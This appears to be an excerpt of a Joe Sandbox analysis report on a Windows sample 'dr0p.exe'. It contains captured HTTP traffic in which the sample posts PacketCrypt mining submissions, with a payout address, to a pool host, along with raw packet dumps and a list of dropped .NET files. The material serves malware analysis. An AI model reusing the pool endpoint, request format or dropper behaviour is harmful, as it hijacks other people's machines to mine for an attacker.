Jan 7, 2025 14:00:49.756149054 CET	1236	OUT	Data Raw: 27 9d 69 ed 63 ae d5 39 a1 a9 6c 13 79 a3 03 5c 9d 16 42 7f f4 94 63 fa b4 ab b6 6f 0b 3c fc 38 d4 10 f1 d7 40 1c 24 0d 71 75 ca a9 9b 32 71 27 e6 20 b3 ca 76 9f 64 aa 90 7a a4 ec e9 14 04 13 37 4d 18 d4 4d 75 c8 c1 d3 49 c0 30 bc 30 8f 1e 61 7a Data Ascii: 'ic9ly\Bco<8@$qu2q' vdz7MMuI00az)"tsgrS-=xjJD.+Jq%^k*zp$q)M]I?XP=,-/o5%\k`e400UoQ\|CjJ+
Jan 7, 2025 14:00:49.756182909 CET	2472	OUT	Data Raw: cb f7 16 cb 50 3c be 2d c3 08 0d 0a 34 30 30 0d 0a 01 5e 72 00 51 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: P<-400^rQ\|CjJ+wj]aTAULHO(8E-Za=S},8KVPL&ID+wpC/@mKAF;{54&R\e?Z)q!oZs9
Jan 7, 2025 14:00:49.756269932 CET	2472	OUT	Data Raw: 27 c8 f6 59 c3 04 a2 0c 5f c7 a2 8b 89 3b 71 53 b8 fd 47 51 68 a7 fb fe d5 dc 30 84 d9 bc 09 be a5 5a 2c 39 2a 5d ef 74 49 7e 6e 5a 87 7d f9 ed 0b aa 8d 03 44 d5 46 a9 47 81 94 a0 7c 41 f1 c2 dc 3a c2 df db 91 47 4a 8c e7 08 24 98 02 49 b5 78 10 Data Ascii: 'Y_;qSGQh0Z,9*]tI~nZ}DFG\|A:GJ$IxL}) !9?<siw{fkzu#%C0i3f;dm5W?mZl+C}Y&K'?`DnX&2a_ig0SeWI4Q:
Jan 7, 2025 14:00:49.756283045 CET	2472	OUT	Data Raw: 82 da 9f 8d c4 e0 00 b7 10 6f 3e 7b 48 11 d3 03 f0 f6 6f fb 24 65 10 34 1e 12 fb 22 9b 8b 71 76 9a 7c 95 15 19 53 98 ef 1c a7 c3 93 5e ff 3e cb d1 85 8c 01 f4 f1 4c d2 83 18 7d 21 cb 4d cf e6 99 fd e0 3e 0a 80 12 a2 50 5a 28 cc 8d 43 da 4b 55 6a Data Ascii: o>{Ho$e4"qv\|S^>L}!M>PZ(CKUj4Hn(DU`EoEuYSxcrTr[:)6%%nvAWh2lmDM.W%Ai68d{ln@8l>0400xP\|CjJ+
Jan 7, 2025 14:00:49.756306887 CET	4944	OUT	Data Raw: c4 51 7d 77 a6 6a 0d 98 1f 31 bc 60 2c ba 9c bf 0e bf c3 5a 80 e8 45 c7 76 a4 33 5b ec bd d6 77 6c a9 9c 3c 47 35 1b 3f af 2f 35 55 55 aa 77 02 f8 27 e7 6b 80 88 06 1d 34 ee 32 56 da d4 98 5e 79 30 35 70 aa 40 e9 49 89 c1 a8 10 81 89 a3 bc 0d 56 Data Ascii: Q}wj1`,ZEv3[wl<G5?/5UUw'k42V^y05p@IV`;4:;\&T[ryp,[4q6LXuPm,mN.{H@NV'\|B^vWN<8uC$qQ# P-DdxO7ac+7
Jan 7, 2025 14:00:49.756371975 CET	4944	OUT	Data Raw: a4 6f 9f 6d 41 42 53 ff 3b 8a 67 f5 57 03 54 e1 e0 af fd 81 c6 66 0d 0a 34 30 30 0d 0a 01 52 37 0e 4f 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: omABS;gWTf400R7O\|CjJ+VvMtHwpg<@=c-t()T&gY#`q?*BJuwD4j/h_sbmnJRq#
Jan 7, 2025 14:00:49.756398916 CET	2472	OUT	Data Raw: 00 34 d0 50 87 6d de 9d 82 62 bc 0e fb cf da 53 96 ed 09 28 71 d1 d8 a0 1d a4 0b b6 60 0d 08 a8 2e 6a d8 13 f2 19 45 e1 4a 47 b3 f0 c6 0d 29 57 62 e5 33 e5 34 e1 9b 8c c2 ce b9 12 a7 42 4c 8b a1 73 9f 3b ed 0d 5e 5e 4c fa 43 21 39 30 90 5a 9b f0 Data Ascii: 4PmbS(q`.jEJG)Wb34BLs;^^LC!90Z}2A`zyPJzlh0}%nYjJD.+Jq%^k*zp$q)M]I?;AUy2hBwZH6+ycd??0400A
Jan 7, 2025 14:00:49.756418943 CET	2472	OUT	Data Raw: 16 9f d5 be a9 0d 4c c2 d9 9e 99 92 69 02 60 f1 5b 36 30 20 3b dc 57 54 e8 b8 3d aa d9 d9 09 f9 8a 72 2a 73 ae e1 c7 95 20 02 94 3f 9f 24 91 74 2e 80 f3 03 4d 30 e8 71 36 b3 36 b8 95 be 8c 1e 41 51 e6 87 6d 82 b1 76 82 14 c7 ba 75 e7 4b 41 dc 7a Data Ascii: Li`[60 ;WT=rs ?$t.M0q66AQmvuKAzl=vqDQV';)@&l@zfA;[+WoHV+xRn~a:Q*7+}4v.%t/5U_3WU]! fFkuftGB
Jan 7, 2025 14:00:49.761082888 CET	2472	OUT	Data Raw: da b4 d2 02 4a 73 0c 6a 10 d6 8c ad bb 3a 35 70 6a 51 af 56 43 f8 4e ec a1 c5 4f 92 b9 62 c6 9a ec c3 df 6a 45 3b 0c f1 bd f0 8f 3a 34 0d 5b 78 21 cd ea 91 66 7b db ac 45 75 f1 a6 aa 98 76 c5 e0 71 96 b0 4c 90 78 cc 2c 69 f6 b2 84 47 5d f5 f0 ca Data Ascii: Jsj:5pjQVCNObjE;:4[x!f{EuvqLx,iG]Fak3{\|R#rc}e{?wf_d_]:`3UYMmsgKT@\|4\|\X2rO%VP!:]Sdt/T!n-
Jan 7, 2025 14:00:50.869678974 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:50 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 32 34 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 32 34 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 35 30 37 38 30 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 41 46 33 34 43 41 46 44 46 30 45 39 45 42 34 41 46 37 35 45 35 43 41 45 34 39 39 30 33 42 34 41 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":524,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":524,"totalLen":0,"target":521618356,"time":1736254850780,"eventId":"cah-2837098-AF34CAFDF0E9EB4AF75E5CAE49903B4A"}}
Jan 7, 2025 14:01:16.832915068 CET	64272	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked Data Raw: 34 30 30 0d 0a 01 54 03 01 55 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 8d 48 9f 04 65 86 bc e8 03 28 e2 fb 6f c4 9c 70 e1 05 42 d9 6c 4c ad 2f 9f 2d b7 f0 66 e7 b6 41 da 59 05 71 8a c0 45 4e 45 c5 6b d0 56 ee 03 77 97 3c bf 36 f9 a1 68 5c 49 3b 03 cc 1f 32 e2 ce 6e 03 72 31 9b ba 07 42 6b 2f ec 12 c7 c5 41 fa b6 2e 76 f7 74 d9 81 df c1 c1 42 8f 30 8e 87 0c 67 33 87 c4 e7 cb 91 28 bf 9d 74 a7 c7 13 9d dd 9f 14 c9 b6 0e f8 79 b7 65 b7 ce da 54 bc cd 64 b2 03 0e 26 3c f2 82 77 64 dc 62 2a 78 d8 a3 0b 37 e9 6a f3 52 85 5a 5d 2b a6 c0 db 79 ac 26 65 88 d3 ba 33 1a d4 0a 82 b3 11 52 f1 a7 5a fe 94 e7 34 3d 9e 3c fb ee c2 8d 85 1d f4 9f 5b db 82 5e 61 dd dd 8a 16 70 ad f1 26 61 fd b9 10 98 53 08 81 58 c2 c3 7c 94 1e f5 88 be a6 8f b7 99 d6 66 b7 dc 0a c3 8d 4f 59 fa c2 da 60 46 11 3b 2a b7 7e 8c 99 [TRUNCATED] Data Ascii: 400TU\|CjJ+He(opBlL/-fAYqENEkVw<6h\I;2nr1Bk/A.vtB0g3(tyeTd&<wdbx7jRZ]+y&e3RZ4=<[^ap&aSX\|fOY`F;~ UUBj{<p$nolZX2knuqM`g`?MO)g8vj2L0FRDBYm@b9A-:;a'iT$okr];p{Pbs]a'=vPZH.\@,DT6s[%g@8iR<v6!bSNNx>g}6Jv$#!e>N{$pZ6}n%a }zi~vvHP^AXLD>0)V\|Z O,-n;/:Z;QWtr_!l;>u+!@iQS^fv3#eXhvskZ~T53S{KR^`O<`ZEJ%):Urk0dhi6um;]b0\&w6l[>wKC?{B5O5v8K oA9"KR<NK29.#(73"G_D"XkvIq2tj.SM [TRUNCATED]
Jan 7, 2025 14:01:19.209034920 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:19 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 32 34 39 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 32 34 39 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 37 39 31 32 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 43 38 33 30 45 37 31 37 45 31 37 31 45 44 42 43 41 34 32 30 46 39 38 31 44 38 46 30 42 39 38 41 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":249,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":249,"totalLen":0,"target":521618356,"time":1736254879122,"eventId":"cah-2837098-C830E717E171EDBCA420F981D8F0B98A"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:01:10.101275921 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837099 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:01:10.101397991 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 51 bc 0b 51 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400QQ\|CjJ+aR3C&cHVd.ZOIl8vUTkfE<+$ixS6_l\\EOKV,g2t[4ctC!{x\zVJru d%lV
Jan 7, 2025 14:01:10.106122017 CET	1236	OUT	Data Raw: ef 2f 1d a4 1d 1a 6a 1a b5 83 e0 3c d8 a6 13 ae 94 49 91 22 e9 bb d3 b9 05 c0 ef 45 58 fe 8e e8 46 4b a8 2a 78 61 bc a4 60 98 be 30 05 79 13 dd 83 5c a5 c6 b5 6c e6 7e 84 1e 1a 2c f1 22 73 99 1f 10 4d e0 0b 19 27 14 18 06 5a 05 4d 59 6d 2c 6d 4a Data Ascii: /j<I"EXFK*xa`0y\l~,"sM'ZMYm,mJ%>"`HYhYH)KSi?9%[k-xYb]\|jFs F ;Vc>`_,\5w,_qFeoRJS+400uS\|CjJ+
Jan 7, 2025 14:01:10.106286049 CET	2472	OUT	Data Raw: 2f cc 9d 86 40 c9 b8 ee 53 e1 0d 0a 34 30 30 0d 0a 01 bf d6 0b 51 7c 8c e1 b4 43 17 1f 6a 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: /@S400Q\|CjJ+h#[^MVLNd{fn!J!\|-hef1ipf\|CZCLanjvu([Un25u<Au5zn)/ZmMJO^
Jan 7, 2025 14:01:10.106303930 CET	2472	OUT	Data Raw: 1f 35 80 ed ce 65 39 06 67 6c 81 ab 9a 1f 36 16 ad c1 c3 d8 56 55 df a9 36 b5 28 72 4f 6f 60 47 98 c0 c5 21 7d d0 bd 9a 54 5b 69 ab 91 ec ba 1a 72 a4 da 83 61 05 8d e7 62 3a 2f cd 76 58 20 a8 68 aa 8e c7 7c fd 2b ea cf 67 26 96 47 dd ed 4c 1f c4 Data Ascii: 5e9gl6VU6(rOo`G!}T[irab:/vX h\|+g&GLBnS`Kb6Zo_z6Ji:qqF)B4Gm5CTiU\|%kug(6Cq]u\|wjjx^~t}\EnDpSe
Jan 7, 2025 14:01:10.106365919 CET	2472	OUT	Data Raw: 3b 06 0d c2 c6 43 6c c2 15 27 1f 7c 13 0c 0d e1 d8 68 a8 2d fd 7d ac 64 21 56 a7 d1 4a 25 f6 72 67 81 f3 e9 e5 54 16 b1 09 00 67 e9 11 5e 77 72 1f a1 82 ba d9 a9 f4 1c d8 41 49 74 45 ae a3 e0 2f 1d 77 c5 cb 97 5e 3a 3b 13 40 50 93 aa 37 14 7a ad Data Ascii: ;Cl'\|h-}d!VJ%rgTg^wrAItE/w^:;@P7zjps~\]z9&Li"?1}Q&Ci>"0R)gMy^2}8!Y&e6^nOBoZ5$f:6\'@VLheCkave400uR\|CjJ+
Jan 7, 2025 14:01:10.106388092 CET	2472	OUT	Data Raw: c4 b7 2a db 20 57 05 a9 3a 46 33 7c b9 8c fb 25 c6 41 1c 68 76 6d 4f 8d db 69 1e 51 5f b5 51 5a 6f f2 be 08 35 c2 ad 23 df 6d d8 13 fb 10 85 48 41 22 eb 9d da 8c 11 16 9f 05 eb c9 42 00 dc 16 17 cf 0b fc 78 34 2c f5 ac 8d 05 17 84 67 2f 96 db ea Data Ascii: * W:F3\|%AhvmOiQ_QZo5#mHA"Bx4,g/e.ya'`BDG]b?-*wwb%v+\|ZB1 \uWQoRak/\17@5_t$GP=!Bbw\|j6U]zAkKOQ(AP':1_O
Jan 7, 2025 14:01:10.106476068 CET	4944	OUT	Data Raw: 7d 51 8f db ec 78 ff 25 71 d2 a0 6f b0 1a 11 07 b5 93 d3 cf 72 32 16 93 47 7b c4 ae 46 9f b3 5d 44 f2 9a 57 e1 da 39 7f e9 e8 ec 7b 79 2e 29 53 36 ce c3 8b 1a 2b 3e 8f 63 d0 58 3a a3 a4 eb 82 41 de 93 62 36 1f 27 84 0a 3d 31 d8 c6 4a 8e 64 a4 6a Data Ascii: }Qx%qor2G{F]DW9{y.)S6+>cX:Ab6'=1Jdj,E@\|W5aR$oQUV[+:(^AA:Zoo;~XeNFZ4{/C;x:7kuA[bilAN0y^o=X&%-Gw
Jan 7, 2025 14:01:10.106497049 CET	2472	OUT	Data Raw: ce 19 40 7c 7b 91 75 c5 4d d5 3c df 4d 8f 29 b3 c5 02 0f b6 5e dd f8 f6 75 16 e5 ae 42 27 8c 57 60 f2 7d 4b 06 d9 29 a1 cf e2 74 08 35 2d 3f 02 98 e8 a6 35 d6 d6 6f 61 1b 84 d0 dd 54 da d9 60 4c 29 b8 16 56 d1 07 e1 68 a3 39 9a 2e 56 86 e9 46 53 Data Ascii: @\|{uM<M)^uB'W`}K)t5-?5oaT`L)Vh9.VFSRu SK2$=q00a$e,- aUomH+Z>&jErw198}muz%IfN4{c\|2bG/XWYi
Jan 7, 2025 14:01:10.106524944 CET	4944	OUT	Data Raw: 18 40 c8 11 c2 f7 c6 b1 02 5e 36 d5 99 0d bd b5 66 d2 13 be 64 65 b2 71 46 dd 13 0a 1d 31 65 7f fa 1a f3 5e f7 e2 6d e2 78 5f 4f f1 9c 1a e4 8f 74 81 ad 1f d0 46 23 0b 32 a9 5f 99 47 19 f4 f7 91 48 ae 4f 3c 68 f8 23 70 82 1e c6 f9 53 25 76 ee fc Data Ascii: @^6fdeqF1e^mx_OtF#2_GHO<h#pS%vWI{p<=I4pD(BQXSBze^eP9vG{ }*J al9/C&D=X>@,pVZ,;5B400`
Jan 7, 2025 14:01:10.110917091 CET	2472	OUT	Data Raw: b6 c4 60 fe cc 6f a1 83 51 13 fb 49 8c 34 11 cf ac ad 55 33 b9 9b 04 7d 05 ff 1b ed 6e ee 50 ca 64 8f 49 3c 15 c0 2d 7b fb 4d e2 26 e4 79 14 a8 67 b1 ca 74 cc 3c 2a 6a 4b 6e 63 5d f7 5e 0b a5 46 05 0a e1 08 5b ff 69 e1 a6 e9 52 41 9c 85 77 cc 36 Data Ascii: `oQI4U3}nPdI<-{M&ygt<jKnc]^F[iRAw61u3u=S'\r81>KAw@i3"i4uH3g`WqgHO<9AJ"@B% $P{fF- oc(qr\^Cz8+
Jan 7, 2025 14:01:11.256839991 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:01:11 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 31 30 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 31 30 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 37 31 31 36 30 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 38 2d 38 41 38 39 37 42 46 36 35 37 43 33 38 38 46 34 37 41 34 35 35 41 39 43 39 37 38 42 32 41 38 36 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":510,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":510,"totalLen":0,"target":521618356,"time":1736254871160,"eventId":"cah-2837098-8A897BF657C388F47A455A9C978B2A86"}}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dr0p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Primitives.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.Win32.Registry.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.deps.json

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\PacketCryptApp.runtimeconfig.json

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.AppContext.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Buffers.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Concurrent.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Immutable.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.NonGeneric.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.Specialized.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.Collections.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.Annotations.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.DataAnnotations.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\904\System.ComponentModel.EventBasedAsync.dll

Windows Analysis Report
dr0p.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 14:01:27.505784035 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837100 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 14:01:27.505856037 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 de 06 00 4f 7c 8c e1 b4 43 17 1f 6b 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400O\|CkJ+(hYzq8_y\M}csjr-R3=Z*Rqt}Ngn;[&r>{w,+3(V5>S{S5u5,dT.
Jan 7, 2025 14:01:27.510915995 CET	1236	OUT	Data Raw: c3 60 96 d7 04 84 3c 78 ff ff 68 6b df 53 67 bf a7 e7 5c f9 46 aa 79 cd ec d2 af 78 ac 2f c0 16 ee 13 b0 b5 76 61 27 9d fa 0b 27 95 e7 ef 73 e5 84 e5 ca 06 df ce 8e 6e 7c 16 72 4d 3b 74 49 cd 56 f7 82 b9 fe 8f 4e ef f2 99 19 52 09 d3 ba eb 8f 33 Data Ascii: `<xhkSg\Fyx/va''sn\|rM;tIVNR3Vc<1sP=yP32C5JO0L:l)]aN1mz)0qcyg:4inYs(I\|<*Z\|T0j8P,`w8I/G400)9O\|CkJ+
Jan 7, 2025 14:01:27.510946035 CET	4944	OUT	Data Raw: 8d 57 c7 cb 19 7c 29 63 2a fe 0d 0a 34 30 30 0d 0a 01 b5 2e 00 4e 7c 8c e1 b4 43 17 1f 6b 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: W\|)c400.N\|CkJ+Cl01IicT]b%)czU^}sK=*wX,TMv1>\|$&1 ZKr)OcT}m
Jan 7, 2025 14:01:27.511035919 CET	4944	OUT	Data Raw: 3c 25 2c a1 8d 19 3c 0b 30 32 7b eb ab a0 2b 0c 0f a5 cd 17 2e 7c ed 5d 67 03 03 4c de 83 29 63 08 35 65 01 64 a7 f6 72 c0 33 e6 3b a5 db 1f ee a1 95 7b 85 08 da e2 0f be d9 54 ad b8 b5 10 50 b4 e5 18 b7 49 81 94 35 8f 34 b6 5a 2a 54 1f ba 8f e5 Data Ascii: <%,<02{+.\|]gL)c5edr3;{TPI54ZTB\2$a\I%t6{9`ol2u:u;"x}\YY}W"zVLkU?bfE':5r$?400EN\|CkJ+
Jan 7, 2025 14:01:27.511131048 CET	4944	OUT	Data Raw: d8 92 3f 5f 65 2f d1 0a 45 ca 9b 1f 3c e4 c0 37 d5 1d 18 0c a0 aa 15 10 18 aa 31 17 e2 31 a3 32 a7 72 fc 20 12 d3 bd 2b 02 89 a9 3f b3 50 0a e6 ac b3 5e 27 c5 b4 6d 53 b0 89 e2 1e a9 eb bc a3 e3 d2 cc 3f b5 d1 7f 99 1c fc b2 6c 14 b7 41 1d 96 d8 Data Ascii: ?_e/E<7112r +?P^'mS?lAzfLm..g2uT-ubHVFpWEjthA;(nwhxN4O{}=xJb^!\:t)/d!}\>kxa2kP<;
Jan 7, 2025 14:01:27.511219978 CET	4944	OUT	Data Raw: c8 06 de 96 c8 27 fb 4e 09 9c 33 be d8 38 9b 24 37 8d 6a a1 dd 72 2a cb a7 72 0c bd be 87 91 1a 6f 5c bf e6 93 e9 56 8c 98 d5 5c 0b 8c d1 58 d3 6c 74 6c cc 6f 20 47 a6 b4 07 5d 84 4d be 7f 9f 91 85 ce 19 99 64 b9 64 85 32 83 ce 88 2f 4c fa 7b 1f Data Ascii: 'N38$7jrro\V\Xltlo G]Mdd2/L{0>}C.yBy,u0QN5T%]ZbNx#~-zsuOIX,{[Slzp_8#\|S2}4Fd#ynhWb%LdGYd\| A%F1F_>
Jan 7, 2025 14:01:27.511243105 CET	1236	OUT	Data Raw: bc 9e 4c a9 65 34 4e 35 34 a3 08 85 51 1d f8 a3 4b 33 99 ae 54 13 11 19 f3 e6 1e 05 c8 b0 2c ce a3 81 ad 9a 46 a6 47 8e 5c b5 b9 b5 20 be c2 b5 f8 74 0c 60 42 88 2c 57 52 dd 27 ec 05 ff 70 ef 82 5a bc cf 19 85 a8 8a ba da 5b 1a 34 1b 2f 3f ec 43 Data Ascii: Le4N54QK3T,FG\ t`B,WR'pZ[4/?C}M( `3(E'q1]69uRCV~4/<;Aq;!@q4<}j/vs3pnrh X<"8D#8=}R
Jan 7, 2025 14:01:27.516319036 CET	1236	OUT	Data Raw: 01 15 56 19 a5 b4 a9 c3 42 4e 55 45 32 c5 4a d4 fb 9d 1a bb ef cb 8b b4 c6 de bc 26 c9 e3 63 24 ef a8 7b 5c c8 44 af 81 1a 52 9a 4f b8 24 39 b7 4e f6 eb 6f 61 46 b3 f2 81 e9 83 fb 1c be 5b 65 c1 2b d2 e9 34 9b c3 74 af 5f cd 19 d3 52 d4 c0 6a ca Data Ascii: VBNUE2J&c${\DRO$9NoaF[e+4t_Rj9]O'XYce^o(K6WoEdTCTZAwzxy0nA?M<FSU-A\|Nne>Mby>MKekhZwAC1HjvIT<gzC<
